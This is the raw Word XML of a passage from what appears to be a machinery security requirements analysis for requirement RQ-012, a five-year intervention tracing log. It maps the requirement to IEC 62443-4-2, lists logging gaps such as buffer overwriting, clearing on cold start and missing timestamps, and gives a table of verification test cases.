        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48621BB5" w14:textId="77777777" w:rsidR="0034645C" w:rsidRPr="006D5B99" w:rsidRDefault="0034645C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="507856AC" w14:textId="77777777" w:rsidR="0034645C" w:rsidRPr="006D5B99" w:rsidRDefault="0034645C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66C08675" w14:textId="77777777" w:rsidR="0034645C" w:rsidRPr="006D5B99" w:rsidRDefault="0034645C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43593F89" w14:textId="77777777" w:rsidR="0034645C" w:rsidRPr="006D5B99" w:rsidRDefault="0034645C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FF540B6" w14:textId="77777777" w:rsidR="0034645C" w:rsidRPr="006D5B99" w:rsidRDefault="0034645C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EE2A11D" w14:textId="77777777" w:rsidR="00641812" w:rsidRPr="006D5B99" w:rsidRDefault="00641812" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44758C3E" w14:textId="60238CEF" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>REQUIREMENT 12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C920A0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246F8DEE" w14:textId="5D323CCC" w:rsidR="00547898" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MVO-ID: </w:t>
      </w:r>
      <w:r w:rsidR="00547898" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RQ-012</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A4ACBD" w14:textId="694DE558" w:rsidR="00547898" w:rsidRPr="006D5B99" w:rsidRDefault="00547898" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVO Requirement Text: The system shall enable a tracing log of data generated in relation to an intervention for five years after the machinery or related product has been placed on the market or put into service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5683C139" w14:textId="29079821" w:rsidR="00547898" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IEC 62443-4-2 CR</w:t>
      </w:r>
      <w:r w:rsidR="00825D9D" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001D4045" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mapping</w:t>
      </w:r>
      <w:r w:rsidR="00197C3B" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00547898" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CR 2.8, CR 2.9</w:t>
      </w:r>
      <w:r w:rsidR="00C20140" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, CR 2.10, CR 3.9, CR 6.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17989D7F" w14:textId="7CE5FC8A" w:rsidR="00547898" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Target Assets: </w:t>
      </w:r>
      <w:r w:rsidR="00547898" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I (tracing log)</w:t>
      </w:r>
      <w:r w:rsidR="006E361A" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, F (Domain Separation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DED94B" w14:textId="3248CA53" w:rsidR="00547898" w:rsidRPr="006D5B99" w:rsidRDefault="00196EB6" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">STRIDE: </w:t>
      </w:r>
      <w:r w:rsidR="007F5A7B" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00547898" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F9226F" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(Tampering), </w:t>
      </w:r>
      <w:r w:rsidR="00547898" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Repudiation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A7C46C" w14:textId="77777777" w:rsidR="00F9226F" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Function (Mitigation): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6066389C" w14:textId="7401D721"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Error Log ≥100 entries (SRIO-10703).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9697FB" w14:textId="5EE20638"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Circular buffer: Oldest overwritten when full (SRIO-10663).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089633E0" w14:textId="08FD9BE6" w:rsidR="004B348A" w:rsidRPr="006D5B99" w:rsidRDefault="004B348A" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cleared on cold start (SRIO-6521): stated as the deficiency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDDC832" w14:textId="77777777" w:rsidR="00A11880" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Identified Gap: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB2354B" w14:textId="3738D3E3"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6D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> RQ-008 G-3.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B34AD2" w14:textId="6033F677"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G-2</w:t>
      </w:r>
      <w:r w:rsidR="00F9541D" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">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6D5B99" w:rsidRDefault="00C41A17" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-3 (incomplete retained scope)</w:t>
      </w:r>
      <w:r w:rsidR="00F9541D" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">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6D5B99" w:rsidRDefault="00653E02" w:rsidP="00547898">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57E96E8D" w14:textId="77777777" w:rsidR="00D90833" w:rsidRPr="006D5B99" w:rsidRDefault="00D90833" w:rsidP="00547898">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7459D41D" w14:textId="77777777" w:rsidR="00D90833" w:rsidRPr="006D5B99" w:rsidRDefault="00D90833" w:rsidP="00547898">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A7D9CD2" w14:textId="77777777" w:rsidR="00D90833" w:rsidRPr="006D5B99" w:rsidRDefault="00D90833" w:rsidP="00547898">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DE909B8" w14:textId="77777777" w:rsidR="00D90833" w:rsidRPr="006D5B99" w:rsidRDefault="00D90833" w:rsidP="00547898">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54595C54" w14:textId="77777777" w:rsidR="00D90833" w:rsidRPr="006D5B99" w:rsidRDefault="00D90833" w:rsidP="00547898">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10D10373" w14:textId="77777777" w:rsidR="00D90833" w:rsidRPr="006D5B99" w:rsidRDefault="00D90833" w:rsidP="00547898">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="282A2420" w14:textId="77777777" w:rsidR="00D90833" w:rsidRPr="006D5B99" w:rsidRDefault="00D90833" w:rsidP="00547898">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CCD48A7" w14:textId="77777777" w:rsidR="00D90833" w:rsidRPr="006D5B99" w:rsidRDefault="00D90833" w:rsidP="00547898">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="659E6CC4" w14:textId="77777777" w:rsidR="00D90833" w:rsidRPr="006D5B99" w:rsidRDefault="00D90833" w:rsidP="00547898">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="133E9E8C" w14:textId="77777777" w:rsidR="00D90833" w:rsidRPr="006D5B99" w:rsidRDefault="00D90833" w:rsidP="00547898">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30A365C6" w14:textId="77777777" w:rsidR="00D90833" w:rsidRPr="006D5B99" w:rsidRDefault="00D90833" w:rsidP="00547898">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76BA2F49" w14:textId="77777777" w:rsidR="00D90833" w:rsidRPr="006D5B99" w:rsidRDefault="00D90833" w:rsidP="00547898">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EA19EDA" w14:textId="77777777" w:rsidR="00D90833" w:rsidRPr="006D5B99" w:rsidRDefault="00D90833" w:rsidP="00547898">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A87C4F9" w14:textId="77777777" w:rsidR="00D90833" w:rsidRPr="006D5B99" w:rsidRDefault="00D90833" w:rsidP="00547898">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37A16066" w14:textId="77777777" w:rsidR="00D90833" w:rsidRPr="006D5B99" w:rsidRDefault="00D90833" w:rsidP="00547898">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11FC88E5" w14:textId="77777777" w:rsidR="00D90833" w:rsidRPr="006D5B99" w:rsidRDefault="00D90833" w:rsidP="00547898">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D620F36" w14:textId="77777777" w:rsidR="00D90833" w:rsidRPr="006D5B99" w:rsidRDefault="00D90833" w:rsidP="00547898">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B67E2DC" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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6D5B99" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A68EE6E"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268FE3B4"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791F4009"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EE89CB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6D5B99" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1818BC1D" w14:textId="77777777" w:rsidR="00CF2964"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Capacity/overflow: generate &gt;100 loggable events; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DB80F9D" w14:textId="01125BA9" w:rsidR="00900880" w:rsidRPr="006D5B99"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oldest entries overwritten (fixed buffer)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="793BD67E" w14:textId="7D881D1F" w:rsidR="00900880" w:rsidRPr="006D5B99"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G-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07A0A586" w14:textId="5FF5E762" w:rsidR="00900880" w:rsidRPr="006D5B99"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 (log review); OWASP ISTG-DES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38FAC1FF" w14:textId="558447C9" w:rsidR="00900880" w:rsidRPr="006D5B99"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8403A3" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00900880" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C9224F1"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Cold-start deletion:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3300E90C" w14:textId="77777777" w:rsidR="008D65FB"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populate the log, cold-start, confirm cleared; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54DF114F" w14:textId="6DA02038" w:rsidR="00900880" w:rsidRPr="006D5B99"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optionally check EC3/EC4 recovery as exploratory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CA7D60D" w14:textId="608F994A" w:rsidR="00900880" w:rsidRPr="006D5B99"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1DCB55BD" w14:textId="4A74EC68" w:rsidR="00A3132A" w:rsidRPr="006D5B99"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NIST SP 800-115 §3.2 / §7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CA50329" w14:textId="69C0B03D" w:rsidR="00900880" w:rsidRPr="006D5B99"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0E2CEE" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="008403A3" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00900880" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="314F431F" w14:textId="0B31A69B" w:rsidR="00900880" w:rsidRPr="006D5B99"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6D5B99"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is structural</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FAB2FA1" w14:textId="457EA3A7" w:rsidR="00900880" w:rsidRPr="006D5B99"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Requirements-based + documentation review (SRIO-1812)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="254F0DB4" w14:textId="34DB07C3" w:rsidR="00900880" w:rsidRPr="006D5B99"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0880" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FDBAF41" w14:textId="399FFDEB" w:rsidR="00900880" w:rsidRPr="006D5B99"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Time-attribution: confirm no absolute timestamp on any retained entry, so a 5-year window cannot be bounded (reuse TC-RQ003-04)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39DF311F" w14:textId="7D0D105C" w:rsidR="00900880" w:rsidRPr="006D5B99"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G-2 compound</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="426C4A4D" w14:textId="39BA865B" w:rsidR="00900880" w:rsidRPr="006D5B99"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 xml:space="preserve">NIST SP 800-115 §3.2 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F6B5638" w14:textId="4D0DA39A" w:rsidR="00900880" w:rsidRPr="006D5B99"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w:t>
            </w:r>
            <w:r w:rsidR="008403A3" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2B76DA61" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09A48785" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07EFA959" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 3 - Two-Level Test Catalog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3286DE80" w14:textId="77777777" w:rsidR="00AE338E" w:rsidRPr="006D5B99" w:rsidRDefault="00AE338E" w:rsidP="00133045">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F5E0F0E" w14:textId="022AD3B8" w:rsidR="00133045" w:rsidRPr="006D5B99" w:rsidRDefault="00133045" w:rsidP="00AE338E">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ012-01 </w:t>
      </w:r>
      <w:r w:rsidR="00AE338E" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
